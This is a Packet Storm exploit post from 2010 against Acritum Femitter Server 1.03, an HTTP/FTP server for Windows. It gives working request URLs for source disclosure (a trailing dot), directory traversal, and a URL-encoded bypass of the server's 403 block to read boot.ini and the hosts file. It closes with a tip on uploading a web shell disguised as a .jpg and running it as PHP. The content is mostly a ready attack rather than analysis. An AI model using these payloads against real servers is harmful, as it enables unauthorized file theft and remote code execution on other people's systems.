what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Acritum Femitter Server 1.03 Directory Traversal

Acritum Femitter Server 1.03 Directory Traversal
Posted May 4, 2010
Authored by Zer0 Thunder

Acritum Femitter Server version 1.03 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 70d8c3eea2be1ee2ed6403fb115d57db7101305d5849de04947a370cdad60965

Acritum Femitter Server 1.03 Directory Traversal

Change Mirror Download
--=> Exploit Title: Acritum Femitter Server v1.03 Multiple Vulnerabilities
--=> Date: 2/5/2010
--=> Author: Zer0 Thunder
--=> Software Link: http://acritum.com/dist/fem-dist.exe
--=> Version: v1.03
--=> Tested on: XP sp 2


Acritum Femitter Server v1.03 is a HTTP and FTP Server for Windows.
I came up with few vulnerabilities of this .. some vulns are already has been revelied but some are not
so lets have a look


*********************************************************************************************************************************
HTTP Server
-----------

In the Femitter Server Application HTTP tab there are few options to choose, and vulnerability exploitation method will depends on it

If the "Combined Server" is selected [Default Setting]
----------------------------------------------------
--== Source Disclosure Vulnerability==--
even some files like .html will able to download from this vulnerability
just put "." in the end of the file

[+] http://192.168.1.101/index.htm.


--==Directory Traversal Vulnerability==--
If the Femitter Server is installed in "Programe File" this will take you to the C Dir

C: Dir
------
[+] http://192.168.1.101/..\../..\

You can move in to dir by doing "../..\"

but you won't be able to open the files there will be 403 Forbidden Error(still). this is a lame security option in the Femitter Server



*********************************************************************************************************************************

Bypassing 403 Forbidden Error
-----------------------------
This is lame a security option . This can be easily bypass with hex . lets see how its done
This c0de will give you permission to download anyfile
[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fboot.ini

but if you wana open it in the browser you can add a "%<file.type> in the end
--==403 Bypass Example==--

[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fboot.ini%test.txt
[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%test.txt

********************************************************************************************************************************

If the "Web Server (to show default doctument or 404 if it doesn't exsist" option is selected
---------------------------------------------------------------------------------------------

If this option is activated you might have trouble viewing the directory
but still you will be able to see the file and download them


[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fboot.ini%test.txt

and also this will open it as a readable file on the browser

[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fboot.ini% ../


pluse you can use the above application to view unreadable files like .dll .exe .
files like .dll .exe will not be open with %text.txt .. this doesnt make sense right
eventho .dll .exe is not readable this vulnerability can be quite usefull sometime ..

********************************************************************************************************************************
Tips

you can upload a shell renamed .jpg and you will be able to execute it in php like this

http://192.168.1.101/evilshell.jpg%owned.php
*********************************************************************************************************************************

[+] Site : http://lkhackers.com
[+] Email/Msn : zer0_thunder@colombohackers.com
=================================================================================================================================
Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close